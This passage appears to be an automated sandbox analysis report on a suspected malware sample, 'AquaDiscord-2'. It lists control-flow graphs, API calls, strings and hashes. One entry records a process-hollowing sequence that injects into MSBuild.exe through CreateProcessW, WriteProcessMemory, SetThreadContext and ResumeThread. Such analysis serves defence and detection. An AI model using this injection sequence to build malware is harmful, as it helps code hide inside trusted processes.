21348->21354 21350 af898f 21349->21350 21351 af89ac 21350->21351 21352 b01384 67 API calls 21350->21352 21350->21354 21351->21354 21355 b025aa 21351->21355 21352->21351 21356 b025b5 21355->21356 21357 b025ca 21355->21357 21360 b012d4 __dosmaperr 14 API calls 21356->21360 21358 b025d2 21357->21358 21359 b025e7 21357->21359 21361 b012d4 __dosmaperr 14 API calls 21358->21361 21369 b0c2f6 21359->21369 21363 b025ba 21360->21363 21364 b025d7 21361->21364 21366 b019bf __strnicoll 29 API calls 21363->21366 21367 b019bf __strnicoll 29 API calls 21364->21367 21365 b025e2 21365->21354 21368 b025c5 21366->21368 21367->21365 21368->21354 21370 b0c30a _Fputc 21369->21370 21373 b0c89f 21370->21373 21372 b0c316 _Fputc 21372->21365 21374 b0c8ab ___scrt_is_nonwritable_in_current_image 21373->21374 21375 b0c8b2 21374->21375 21376 b0c8d5 21374->21376 21377 b01b68 _Fputc 29 API calls 21375->21377 21384 afd0ff EnterCriticalSection 21376->21384 21379 b0c8cb 21377->21379 21379->21372 21380 b0c8e3 21385 b0c6fe 21380->21385 21382 b0c8f2 21398 b0c924 21382->21398 21384->21380 21386 b0c735 21385->21386 21387 b0c70d 21385->21387 21389 b08e04 _Ungetc 29 API calls 21386->21389 21388 b01b68 _Fputc 29 API calls 21387->21388 21397 b0c728 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21388->21397 21390 b0c73e 21389->21390 21391 b0c130 33 API calls 21390->21391 21392 b0c75c 21391->21392 21393 b0c7e8 21392->21393 21395 b0c7ff 21392->21395 21392->21397 21394 b0c388 34 API calls 21393->21394 21394->21397 21396 b0c533 33 API calls 21395->21396 21395->21397 21396->21397 21397->21382 21401 afd113 LeaveCriticalSection 21398->21401 21400 b0c92c 21400->21379 21401->21400

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00B20110,00B20100), ref: 00B20334
                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00B20347
                                                                                          • Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 00B20365
                                                                                          • ReadProcessMemory.KERNELBASE(0000008C,?,00B20154,00000004,00000000), ref: 00B20389
                                                                                          • VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 00B203B4
                                                                                          • WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 00B2040C
                                                                                          • WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 00B20457
                                                                                          • WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 00B20495
                                                                                          • Wow64SetThreadContext.KERNEL32(0000009C,03270000), ref: 00B204D1
                                                                                          • ResumeThread.KERNELBASE(0000009C), ref: 00B204E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                          • API String ID: 2687962208-3857624555
                                                                                          • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                          • Instruction ID: 8f68f392b8282c44deacae8b6dd40682a3d8689cf58bd56655d792e58530f55a
                                                                                          • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                          • Instruction Fuzzy Hash: 0DB1F87264064AAFDB60CF68CC80BDA73A5FF88714F158164EA0CAB342D774FA51CB94

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AddressCloseCreateHandleProcSize
                                                                                          • String ID: CreateFileA
                                                                                          • API String ID: 2547132502-1429953656
                                                                                          • Opcode ID: 3b3a8397c318f0ec78c903f22b217b869669ca7126df922cdef23f0b01843e77
                                                                                          • Instruction ID: 77bf83dd73c75a25759355b9e12f52bb8964868cbf928b580396b5d610c4b53e
                                                                                          • Opcode Fuzzy Hash: 3b3a8397c318f0ec78c903f22b217b869669ca7126df922cdef23f0b01843e77
                                                                                          • Instruction Fuzzy Hash: 0141B4B0D08209DFCB00EFA8D5586AEBBF0EF48314F008529E899A7350DB749949CF96

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 42 b06602-b0660e 43 b066a0-b066a3 42->43 44 b06613-b06624 43->44 45 b066a9 43->45 47 b06631-b0664a LoadLibraryExW 44->47 48 b06626-b06629 44->48 46 b066ab-b066af 45->46 51 b066b0-b066c0 47->51 52 b0664c-b06655 GetLastError 47->52 49 b066c9-b066cb 48->49 50 b0662f 48->50 49->46 54 b0669d 50->54 51->49 53 b066c2-b066c3 FreeLibrary 51->53 55 b06657-b06669 call b09cc4 52->55 56 b0668e-b0669b 52->56 53->49 54->43 55->56 59 b0666b-b0667d call b09cc4 55->59 56->54 59->56 62 b0667f-b0668c LoadLibraryExW 59->62 62->51 62->56
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,F5340F7A,?,00B06711,00000000,00000000,00000000,00000000), ref: 00B066C3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID: api-ms-$ext-ms-
                                                                                          • API String ID: 3664257935-537541572
                                                                                          • Opcode ID: 4a1beacfa795c5919e684d086448515e70245dd28bfde8aac04fce70c41fcf83
                                                                                          • Instruction ID: 4a677b89f9c7847c04d8fcef529f25e7c1b49623d6bd1c410ee28ffd38e4a205
                                                                                          • Opcode Fuzzy Hash: 4a1beacfa795c5919e684d086448515e70245dd28bfde8aac04fce70c41fcf83
                                                                                          • Instruction Fuzzy Hash: 7C21E732A01215ABD7319B649C44ADA7FE8DB417B0F1502A0FD25A72D0EF31ED11C6D0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 63 b06dea-b06e03 64 b06e05-b06e15 call aff11d 63->64 65 b06e19-b06e1e 63->65 64->65 72 b06e17 64->72 67 b06e20-b06e28 65->67 68 b06e2b-b06e51 call b056ff 65->68 67->68 73 b06fc7-b06fd8 call af7191 68->73 74 b06e57-b06e62 68->74 72->65 75 b06e68-b06e6d 74->75 76 b06fba 74->76 78 b06e86-b06e91 call b056b1 75->78 79 b06e6f-b06e78 call af9f30 75->79 80 b06fbc 76->80 78->80 90 b06e97 78->90 79->80 88 b06e7e-b06e84 79->88 83 b06fbe-b06fc5 call af9ec7 80->83 83->73 91 b06e9d-b06ea2 88->91 90->91 91->80 92 b06ea8-b06ebd call b056ff 91->92 92->80 95 b06ec3-b06ed5 call b064b3 92->95 97 b06eda-b06ede 95->97 97->80 98 b06ee4-b06eec 97->98 99 b06f26-b06f32 98->99 100 b06eee-b06ef3 98->100 102 b06f34-b06f36 99->102 103 b06faf 99->103 100->83 101 b06ef9-b06efb 100->101 101->80 105 b06f01-b06f1b call b064b3 101->105 106 b06f38-b06f41 call af9f30 102->106 107 b06f4b-b06f56 call b056b1 102->107 104 b06fb1-b06fb8 call af9ec7 103->104 104->80 105->83 118 b06f21 105->118 106->104 116 b06f43-b06f49 106->116 107->104 117 b06f58 107->117 119 b06f5e-b06f63 116->119 117->119 118->80 119->104 120 b06f65-b06f7d call b064b3 119->120 120->104 123 b06f7f-b06f86 120->123 124 b06fa7-b06fad 123->124 125 b06f88-b06f89 123->125 126 b06f8a-b06f9c call b057c1 124->126 125->126 126->104 129 b06f9e-b06fa5 call af9ec7 126->129 129->83
                                                                                          APIs
                                                                                          • __alloca_probe_16.LIBCMT ref: 00B06E6F
                                                                                          • __alloca_probe_16.LIBCMT ref: 00B06F38
                                                                                          • __freea.LIBCMT ref: 00B06F9F
                                                                                            • Part of subcall function 00B056B1: RtlAllocateHeap.NTDLL(00000000,00B07635,?,?,00B07635,00000220,?,?,?), ref: 00B056E3
                                                                                          • __freea.LIBCMT ref: 00B06FB2
                                                                                          • __freea.LIBCMT ref: 00B06FBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1423051803-0
                                                                                          • Opcode ID: 96a9e5855576790a151e6be68607f2455f5c34f5dfc67e395efcf6872c004d08
                                                                                          • Instruction ID: e94ea3bfbf5014c75ea09299e8bf93f34aa5c52b302f6235ddbbd9ea2f2f0319
                                                                                          • Opcode Fuzzy Hash: 96a9e5855576790a151e6be68607f2455f5c34f5dfc67e395efcf6872c004d08
                                                                                          • Instruction Fuzzy Hash: FB519372600207AFEB219EA1ED81EBBBFE9DF54750F1501A9FD04D6291EB31DC60D6A0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 132 af1db0-af1e7e call af1000 * 2 GetProcAddress 137 af1e8f-af1ecb VirtualProtect 132->137 138 af1e84-af1e8c 132->138 140 af1edc-af1ef3 call af7191 137->140 141 af1ed1-af1ed7 call af1bd0 137->141 138->137 141->140
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProcProtectVirtual
                                                                                          • String ID: @$VirtualProtect
                                                                                          • API String ID: 3759838892-29487290
                                                                                          • Opcode ID: a08e5fd78fee1a3be1a5b6724acfe734323f83a9e38269b72bb6fb5b0aa5f435
                                                                                          • Instruction ID: 12efb434c298eb400047c9b64d168f8daab7e0939b6189faf2074abfbfd42242
                                                                                          • Opcode Fuzzy Hash: a08e5fd78fee1a3be1a5b6724acfe734323f83a9e38269b72bb6fb5b0aa5f435
                                                                                          • Instruction Fuzzy Hash: 2841E4B0901209DFDB04EFA9D5986EEBBF0FF08314F108419E858AB351D775A945CF91

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00AFF160,?,00AFF315,00000000,?,?,00AFF160,F5340F7A,?,00AFF160), ref: 00AFF264
                                                                                          • TerminateProcess.KERNEL32(00000000,?,00AFF315,00000000,?,?,00AFF160,F5340F7A,?,00AFF160), ref: 00AFF26B
                                                                                          • ExitProcess.KERNEL32 ref: 00AFF27D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: a0b7f673d0b789f915097f8ab05f1bb646eda8127e087af07bd2e1db5b7f218c
                                                                                          • Instruction ID: af551377370ab81362a098d3e4b1a8ed81a11ab23f8ae8b161ea3c9fabc69f0d
                                                                                          • Opcode Fuzzy Hash: a0b7f673d0b789f915097f8ab05f1bb646eda8127e087af07bd2e1db5b7f218c
                                                                                          • Instruction Fuzzy Hash: 98D09E7600010CAFCF012FA0DD0D9ED3F69EF443917888024BE1957131CF31D9529A55

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 152 b0d364-b0d386 153 b0d579 152->153 154 b0d38c-b0d38e 152->154 155 b0d57b-b0d57f 153->155 156 b0d390-b0d3af call b01b68 154->156 157 b0d3ba-b0d3dd 154->157 165 b0d3b2-b0d3b5 156->165 158 b0d3e3-b0d3e9 157->158 159 b0d3df-b0d3e1 157->159 158->156 161 b0d3eb-b0d3fc 158->161 159->158 159->161 163 b0d3fe-b0d40c call b0c112 161->163 164 b0d40f-b0d41f call b0d691 161->164 163->164 170 b0d421-b0d427 164->170 171 b0d468-b0d47a 164->171 165->155 174 b0d450-b0d466 call b0d70e 170->174 175 b0d429-b0d42c 170->175 172 b0d4d1-b0d4f1 WriteFile 171->172 173 b0d47c-b0d482 171->173 176 b0d4f3-b0d4f9 GetLastError 172->176 177 b0d4fc 172->177 179 b0d484-b0d487 173->179 180 b0d4bd-b0d4ca call b0db3d 173->180 190 b0d449-b0d44b 174->190 181 b0d437-b0d446 call b0dad5 175->181 182 b0d42e-b0d431 175->182 176->177 184 b0d4ff-b0d50a 177->184 185 b0d4a9-b0d4bb call b0dd01 179->185 186 b0d489-b0d48c 179->186 197 b0d4cf 180->197 181->190 182->181 187 b0d511-b0d514 182->187 191 b0d574-b0d577 184->191 192 b0d50c-b0d50f 184->192 198 b0d4a4-b0d4a7 185->198 193 b0d517-b0d519 186->193 194 b0d492-b0d49f call b0dc18 186->194 187->193 190->184 191->155 192->187 199 b0d547-b0d553 193->199 200 b0d51b-b0d520 193->200 194->198 197->198 198->190 205 b0d555-b0d55b 199->205 206 b0d55d-b0d56f 199->206 203 b0d522-b0d534 200->203 204 b0d539-b0d542 call b01360 200->204 203->165 204->165 205->153 205->206 206->165
                                                                                          APIs
                                                                                            • Part of subcall function 00B0D70E: GetConsoleOutputCP.KERNEL32(F5340F7A,00000000,00000000,?), ref: 00B0D771
                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00AFD7F2,?,00AFDA54), ref: 00B0D4E9
                                                                                          • GetLastError.KERNEL32(?,00AFD7F2,?,00AFDA54,?,00AFDA54,?,?,?,?,?,?,?,00000000,?,?), ref: 00B0D4F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleErrorFileLastOutputWrite
                                                                                          • String ID:
                                                                                          • API String ID: 2915228174-0
                                                                                          • Opcode ID: ecb527849bf09ea7c14c4159e6d6cf1d340e694f423f04292fede576814e0e07
                                                                                          • Instruction ID: 98aba3f83053635cd2fb4760b86dd98a25d6052faab845df2445aff6a701117e
                                                                                          • Opcode Fuzzy Hash: ecb527849bf09ea7c14c4159e6d6cf1d340e694f423f04292fede576814e0e07
                                                                                          • Instruction Fuzzy Hash: 79618DB1904119AEDF158FE8C884AEEBFF9EF59318F1441C9E904A72D2D731DA41CBA1

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 209 b07268-b07290 call b0746d 212 b07455-b07456 call b074de 209->212 213 b07296-b0729c 209->213 216 b0745b-b0745d 212->216 215 b0729f-b072a5 213->215 217 b073a1-b073c0 call afc650 215->217 218 b072ab-b072b7 215->218 220 b0745e-b0746c call af7191 216->220 227 b073c3-b073c8 217->227 218->215 221 b072b9-b072bf 218->221 222 b072c5-b072d1 IsValidCodePage 221->222 223 b07399-b0739c 221->223 222->223 226 b072d7-b072de 222->226 223->220 229 b07300-b0730d GetCPInfo 226->229 230 b072e0-b072ec 226->230 231 b07405-b0740f 227->231 232 b073ca-b073cf 227->232 235 b0738d-b07393 229->235 236 b0730f-b0732e call afc650 229->236 234 b072f0-b072fb 230->234 231->227 233 b07411-b0743b call b077b9 231->233 237 b073d1-b073d9 232->237 238 b07402 232->238 248 b0743c-b0744b 233->248 240 b0744d-b0744e call b077f7 234->240 235->212 235->223 236->234 250 b07330-b07337 236->250 242 b073fa-b07400 237->242 243 b073db-b073de 237->243 238->231 249 b07453 240->249 242->232 242->238 247 b073e0-b073e6 243->247 247->242 251 b073e8-b073f8 247->251 248->240 248->248 249->216 252 b07363-b07366 250->252 253 b07339-b0733e 250->253 251->242 251->247 255 b0736b-b07372 252->255 253->252 254 b07340-b07348 253->254 257 b0734a-b07351 254->257 258 b0735b-b07361 254->258 255->255 256 b07374-b07388 call b077b9 255->256 256->234 260 b07352-b07359 257->260 258->252 258->253 260->258 260->260
                                                                                          APIs
                                                                                            • Part of subcall function 00B0746D: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00B07498
                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00B07678,?,00000000,?,?,?), ref: 00B072C9
                                                                                          • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B07678,?,00000000,?,?,?), ref: 00B07305
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: CodeInfoPageValid
                                                                                          • String ID:
                                                                                          • API String ID: 546120528-0
                                                                                          • Opcode ID: ec73823bbefe01717a3eb81974505954c408004ddf1b76bab09153203051e2d5
                                                                                          • Instruction ID: 95906368bdc5ed46fc2df81b42e8830a9d641a68cc269a83945152a5b0d5a71d
                                                                                          • Opcode Fuzzy Hash: ec73823bbefe01717a3eb81974505954c408004ddf1b76bab09153203051e2d5
                                                                                          • Instruction Fuzzy Hash: 89511470E482458EEB20CF75C8806AEFFF5EF45300F1884AED49687292DA74B946DB94

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 262 b0db3d-b0db92 call afa010 265 b0db94 262->265 266 b0dc07-b0dc17 call af7191 262->266 268 b0db9a 265->268 270 b0dba0-b0dba2 268->270 271 b0dba4-b0dba9 270->271 272 b0dbbc-b0dbe1 WriteFile 270->272 273 b0dbb2-b0dbba 271->273 274 b0dbab-b0dbb1 271->274 275 b0dbe3-b0dbee 272->275 276 b0dbff-b0dc05 GetLastError 272->276 273->270 273->272 274->273 275->266 277 b0dbf0-b0dbfb 275->277 276->266 277->268 278 b0dbfd 277->278 278->266
                                                                                          APIs
                                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00B0D4CF,?,00AFDA54,?,?,?,00000000), ref: 00B0DBD9
                                                                                          • GetLastError.KERNEL32(?,00B0D4CF,?,00AFDA54,?,?,?,00000000,?,?,?,?,?,00AFD7F2,?,00AFDA54), ref: 00B0DBFF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastWrite
                                                                                          • String ID:
                                                                                          • API String ID: 442123175-0
                                                                                          • Opcode ID: 4ec9560ffc39f92afa519fd65100e6974ad484014933ec5f9a63280354b7d138
                                                                                          • Instruction ID: 6105d059ea366db0753d5657cce0e15e728f5dfa548b03fe64280a24ecd48100
                                                                                          • Opcode Fuzzy Hash: 4ec9560ffc39f92afa519fd65100e6974ad484014933ec5f9a63280354b7d138
                                                                                          • Instruction Fuzzy Hash: CB219130A002199BDB19CF69DD809E9BBF9EB48305F1441E9E946D7291D630EE42CB64

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 279 b07152-b07157 280 b07159-b07171 279->280 281 b07173-b07177 280->281 282 b0717f-b07188 280->282 281->282 283 b07179-b0717d 281->283 284 b0719a 282->284 285 b0718a-b0718d 282->285 286 b071f4-b071f8 283->286 289 b0719c-b071a9 GetStdHandle 284->289 287 b07196-b07198 285->287 288 b0718f-b07194 285->288 286->280 290 b071fe-b07201 286->290 287->289 288->289 291 b071d6-b071e8 289->291 292 b071ab-b071ad 289->292 291->286 294 b071ea-b071ed 291->294 292->291 293 b071af-b071b8 GetFileType 292->293 293->291 295 b071ba-b071c3 293->295 294->286 296 b071c5-b071c9 295->296 297 b071cb-b071ce 295->297 296->286 297->286 298 b071d0-b071d4 297->298 298->286
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00B07041,00B1FCD8,0000000C), ref: 00B0719E
                                                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00B07041,00B1FCD8,0000000C), ref: 00B071B0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileHandleType
                                                                                          • String ID:
                                                                                          • API String ID: 3000768030-0
                                                                                          • Opcode ID: 5beb2d8c26bde94e3b8b0a66926a0583c49e9a7360d22b8e3f4bd15fad2e5a69
                                                                                          • Instruction ID: 84e7d42294da8d7f7edfe488390b170eb13fc18919fd08a8a0c73e1883f8c00a
                                                                                          • Opcode Fuzzy Hash: 5beb2d8c26bde94e3b8b0a66926a0583c49e9a7360d22b8e3f4bd15fad2e5a69
